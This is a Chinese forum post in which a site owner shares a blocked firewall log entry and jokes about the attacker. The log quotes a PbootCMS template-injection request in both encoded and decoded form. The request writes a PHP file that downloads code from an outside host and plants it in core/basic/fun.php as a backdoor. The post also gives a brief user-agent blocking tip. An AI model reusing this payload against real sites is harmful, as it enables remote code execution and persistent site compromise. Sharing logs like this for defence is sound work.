爬虫?抓包?渗透?挂码?提权?可刑,可铐,牢玩家,Python学得好,牢饭吃到饱。下面,分享一条,黑科技日志。黑科技真多,黑科技来了,这些黑科技真的来了?
黑科技日志
时间 2024/07/18 09:27:15
用户IP 143.92.32.133
类型 args
过滤器 args
URI地址:/{pboot:if(("file_put_co"."ntents")("temp.php",("base6"."4_decode")("PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dC9tYTEudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=")))}{/pboot:if}/../../?p=1
User-Agent Python-urllib/3.10
过滤规则 《疑似误拦截提交入口》非浏览器请求已被系统拦截,如想关闭此功能如下操作:Nginx防火墙--全局设置--非浏览器拦截
传入值 空
风险值 空
封锁原因 多次恶意请求
封锁时长 86400秒
状态 封锁中
URI地址解密后
args /{pboot:if(("file_put_co"."ntents")("temp.php",("base6"."4_decode")("<?php file_put_contents('./core/basic/fun.php',file_get_contents('http://d.sogouad.vip/txt/ma1.txt'));echo 'temp111888';unlink(__FILE__);")))}{/pboot:if}/../../?p=1 HTTP/1.1 host:nidecms.com connection:close user-agent:Python-urllib/3.10 accept-encoding:identity
IP归属地:还是服务器啊
归属地:中国香港
运营商:CTG Server Limited
IPV4:143.92.32.133
这年头,黑科技真多,个个都是人才。会用黑科技的是人才,教人玩黑科技的也是人才。
防范于未然
宝塔-防火墙-全局配置-UA黑名单 添加 Python 就好了。
兄弟,你路走歪了,别人学习编程,都是用于开发。你拿渗透当娱乐,不让你笑,你都不知道我文武双全。
目前,正在制作直接封IP代码。URI地址样本正在取样中,预期将在下周内可完成,就等你的黑科技日志啦!
+62 62 个回复 | 最后更新于 2025-01-16
登录后方可回帖